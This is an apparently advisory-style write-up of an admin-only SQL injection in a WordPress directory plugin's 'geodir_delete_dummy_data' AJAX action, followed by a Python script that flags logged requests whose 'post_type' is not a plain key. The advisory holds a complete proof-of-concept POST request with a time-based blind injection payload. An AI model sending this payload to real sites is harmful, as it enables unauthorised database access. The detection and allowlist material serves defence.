The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
POST /wp-admin/admin-ajax.php HTTP/1.1

action=geodir_delete_dummy_data&security=72951761a8&post_type=gd_place_detail+WHERE+4508=4508+AND+(SELECT+2067+FROM+(SELECT(SLEEP(5)))nWvn)--+
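
For detection, the request above differs from a normal one only in that post_type carries more than a plain key. The following is an added example, not code from the plugin or the advisory: a Python check over logged admin-ajax POST bodies. It assumes the bodies are available (for instance from a WAF or reverse proxy that records them) and that a legitimate post_type is a WordPress-style key; the request ids and the benign bodies are constructed.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# AJAX action and parameter names taken from the request in the advisory.
ACTION = "geodir_delete_dummy_data"
PARAM = "post_type"
# Assumption: a legitimate value is a WordPress-style key (what sanitize_key()
# would leave unchanged): lowercase letters, digits, "_" and "-".
KEY_RE = re.compile(r"[a-z0-9_-]+")


def check_body(body: str) -> Optional[str]:
    """Return a reason if a form-encoded admin-ajax body is suspicious, else None."""
    params = parse_qs(body)  # decodes "+" and %xx, splits on "&"
    if ACTION not in params.get("action", []):
        return None  # different AJAX action, out of scope for this rule
    for value in params.get(PARAM, []):
        if not KEY_RE.fullmatch(value):
            return f"{PARAM} is not a plain key: {value!r}"
    return None


def scan(records: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """records are (request id, body) pairs; returns (request id, reason) for hits."""
    hits = []
    for req_id, body in records:
        reason = check_body(body)
        if reason:
            hits.append((req_id, reason))
    return hits


# Constructed sample: request ids are made up; req-2 carries the body from the
# advisory, req-1 and req-3 are constructed benign requests.
SAMPLE = [
    ("req-1", "action=geodir_delete_dummy_data&security=72951761a8&post_type=gd_place_detail"),
    ("req-2", "action=geodir_delete_dummy_data&security=72951761a8&post_type="
              "gd_place_detail+WHERE+4508=4508+AND+(SELECT+2067+FROM+(SELECT(SLEEP(5)))nWvn)--+"),
    ("req-3", "action=heartbeat&post_type=anything+goes"),
]

if __name__ == "__main__":
    for req_id, reason in scan(SAMPLE):
        print(req_id, reason)
```

The same key pattern works as a server-side allowlist check before the value reaches any SQL string, since a value that fails it cannot be a valid post type name.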